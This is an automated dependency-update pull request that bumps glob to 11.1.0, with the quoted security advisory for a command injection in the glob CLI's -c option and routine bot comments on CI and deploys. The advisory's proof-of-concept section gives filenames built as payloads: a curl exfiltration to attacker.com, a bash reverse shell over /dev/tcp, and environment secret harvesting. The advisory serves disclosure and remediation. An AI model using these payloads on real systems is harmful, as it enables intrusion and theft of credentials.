chore(deps): update dependency glob to v11.1.0 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
glob	11.0.3 → 11.1.0

GitHub Vulnerability Alerts

CVE-2025-64756

Summary

The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.

Details

Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:

stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))

Technical Flow:

1. User runs glob -c <command> <pattern>
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using shell: true
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands

Affected Component:

• CLI Only: The vulnerability affects only the command-line interface
• Library Safe: The core glob library API (glob(), globSync(), streams/iterators) is not affected
• Shell Dependency: Exploitation requires shell metacharacter support (primarily POSIX systems)

Attack Surface:

• Files with names containing shell metacharacters: $(), backticks, ;, &, |, etc.
• Any directory where attackers can control filenames (PR branches, archives, user uploads)
• CI/CD pipelines using glob -c on untrusted content

PoC

Setup Malicious File:

mkdir test_directory && cd test_directory

# Create file with command injection payload in filename
touch '$(touch injected_poc)'

Trigger Vulnerability:

# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"

Result:

• The echo command executes normally
• Additionally: The $(touch injected_poc) in the filename is evaluated by the shell
• A new file injected_poc is created, proving command execution
• Any command can be injected this way with full user privileges

Advanced Payload Examples:

Data Exfiltration:

# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'

Reverse Shell:

# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

Environment Variable Harvesting:

# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'

Impact

Arbitrary Command Execution:

• Commands execute with full privileges of the user running glob CLI
• No privilege escalation required - runs as current user
• Access to environment variables, file system, and network

Real-World Attack Scenarios:

1. CI/CD Pipeline Compromise:

• Malicious PR adds files with crafted names to repository
• CI pipeline uses glob -c to process files (linting, testing, deployment)
• Commands execute in CI environment with build secrets and deployment credentials
• Potential for supply chain compromise through artifact tampering

2. Developer Workstation Attack:

• Developer clones repository or extracts archive containing malicious filenames
• Local build scripts use glob -c for file processing
• Developer machine compromise with access to SSH keys, tokens, local services

3. Automated Processing Systems:

• Services using glob CLI to process uploaded files or external content
• File uploads with malicious names trigger command execution
• Server-side compromise with potential for lateral movement

4. Supply Chain Poisoning:

• Malicious packages or themes include files with crafted names
• Build processes using glob CLI automatically process these files
• Wide distribution of compromise through package ecosystems

Platform-Specific Risks:

• POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing
• Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL
• Mixed Environments: CI systems often use Linux containers regardless of developer platform

Affected Products

• Ecosystem: npm
• Package name: glob
• Component: CLI only (src/bin.mts)
• Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
• Introduced: v10.2.0 (first release with CLI containing -c/--cmd option)
• Patched versions: 11.1.0and 10.5.0

Scope Limitation:

• Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
• CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable

Remediation

• Upgrade to glob@10.5.0, glob@11.1.0, or higher, as soon as possible.
• If any glob CLI actions fail, then convert commands containing positional arguments, to use the --cmd-arg/-g option instead.
• As a last resort, use --shell to maintain shell:true behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.

---

Release Notes

isaacs/node-glob (glob)

v11.1.0

Compare Source

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: pnpm-lock.yaml

Scope: all 73 workspace projects
.                                        |  WARN  There are cyclic workspace dependencies: /tmp/renovate/repos/github/eggjs/egg/packages/cluster, /tmp/renovate/repos/github/eggjs/egg/plugins/mock, /tmp/renovate/repos/github/eggjs/egg/packages/egg; /tmp/renovate/repos/github/eggjs/egg/tegg/core/runtime, /tmp/renovate/repos/github/eggjs/egg/tegg/core/test-util
 ERROR  Invalid Version: ^11.0.0

pnpm: Invalid Version: ^11.0.0
    at new _SemVer (/opt/containerbase/tools/pnpm/10.28.0/24.13.0/node_modules/pnpm/dist/pnpm.cjs:38223:17)
    at compare (/opt/containerbase/tools/pnpm/10.28.0/24.13.0/node_modules/pnpm/dist/pnpm.cjs:38616:65)
    at Object.eq (/opt/containerbase/tools/pnpm/10.28.0/24.13.0/node_modules/pnpm/dist/pnpm.cjs:38700:31)
    at installSome (/opt/containerbase/tools/pnpm/10.28.0/24.13.0/node_modules/pnpm/dist/pnpm.cjs:159270:223)
    at _install (/opt/containerbase/tools/pnpm/10.28.0/24.13.0/node_modules/pnpm/dist/pnpm.cjs:159212:21)
    at async mutateModules (/opt/containerbase/tools/pnpm/10.28.0/24.13.0/node_modules/pnpm/dist/pnpm.cjs:159072:23)
    at async recursive (/opt/containerbase/tools/pnpm/10.28.0/24.13.0/node_modules/pnpm/dist/pnpm.cjs:160468:100)
    at async recursiveInstallThenUpdateWorkspaceState (/opt/containerbase/tools/pnpm/10.28.0/24.13.0/node_modules/pnpm/dist/pnpm.cjs:160979:31)
    at async installDeps (/opt/containerbase/tools/pnpm/10.28.0/24.13.0/node_modules/pnpm/dist/pnpm.cjs:160786:11)
    at async /opt/containerbase/tools/pnpm/10.28.0/24.13.0/node_modules/pnpm/dist/pnpm.cjs:194253:23

[cloudflare-workers-and-pages]

Deploying egg-v3 with    Cloudflare Pages

Latest commit:	9f89311
Status:	✅  Deploy successful!
Preview URL:	https://7ee8c389.egg-v3.pages.dev
Branch Preview URL:	https://renovate-npm-glob-vulnerabil.egg-v3.pages.dev

View logs

[coderabbitai]

Important

Review skipped

Bot user detected.

To trigger a single review, invoke the @coderabbitai review command.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

---

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[socket-security]

All alerts resolved. Learn more about Socket for GitHub.

This PR previously contained dependency changes with security issues that have been resolved, removed, or ignored.

View full report

[cloudflare-workers-and-pages]

Deploying egg with    Cloudflare Pages

Latest commit:	9f89311
Status:	✅  Deploy successful!
Preview URL:	https://2286d144.egg-cci.pages.dev
Branch Preview URL:	https://renovate-npm-glob-vulnerabil.egg-cci.pages.dev

View logs

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 87.57%. Comparing base (8c09d7b) to head (9f89311).
⚠️ Report is 1 commits behind head on next.

Additional details and impacted files

@@           Coverage Diff           @@
##             next    #5778   +/-   ##
=======================================
  Coverage   87.57%   87.57%           
=======================================
  Files         563      563           
  Lines       10940    10940           
  Branches     1242     1242           
=======================================
  Hits         9581     9581           
  Misses       1275     1275           
  Partials       84       84           

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.